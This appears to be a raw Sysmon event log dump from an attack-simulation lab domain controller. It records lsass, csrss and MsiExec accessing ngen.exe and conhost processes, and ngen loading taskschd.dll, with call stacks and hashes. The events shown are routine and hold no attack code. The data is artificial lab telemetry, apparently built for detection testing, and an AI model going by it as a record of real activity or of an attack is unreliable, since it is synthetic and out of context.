14:57:24.405{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A20C-00000000BB01}6936c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.405{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A20C-00000000BB01}6936c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.405{A7A01FEF-EBD4-607E-A20C-00000000BB01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.374{A7A01FEF-EBD4-607E-A30C-00000000BB01}35125416C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-A20C-00000000BB01}6936c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.374{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A30C-00000000BB01}3512C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.358{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A20C-00000000BB01}6936c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.358{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-A20C-00000000BB01}6936c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.358{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A00C-00000000BB01}6632c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.358{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A00C-00000000BB01}6632c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.358{A7A01FEF-EBD4-607E-A00C-00000000BB01}6632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.343{A7A01FEF-EBD4-607E-A10C-00000000BB01}69525704C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-A00C-00000000BB01}6632c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.327{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A10C-00000000BB01}6952C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.327{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A00C-00000000BB01}6632c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.327{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-A00C-00000000BB01}6632c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.311{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-9E0C-00000000BB01}6172c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.311{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-9E0C-00000000BB01}6172c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.311{A7A01FEF-EBD4-607E-9E0C-00000000BB01}6172C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.296{A7A01FEF-EBD4-607E-9F0C-00000000BB01}11085816C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-9E0C-00000000BB01}6172c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.280{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-9F0C-00000000BB01}1108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.280{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-9E0C-00000000BB01}6172c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.280{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-9E0C-00000000BB01}6172c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.264{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-9C0C-00000000BB01}1360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.264{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-9C0C-00000000BB01}1360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.264{A7A01FEF-EBD4-607E-9C0C-00000000BB01}1360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.249{A7A01FEF-EBD4-607E-9D0C-00000000BB01}66243180C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-9C0C-00000000BB01}1360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.249{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-9D0C-00000000BB01}6624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.249{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-9C0C-00000000BB01}1360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.249{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-9C0C-00000000BB01}1360c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-9A0C-00000000BB01}3752c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-9A0C-00000000BB01}3752c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.233{A7A01FEF-EBD4-607E-9A0C-00000000BB01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 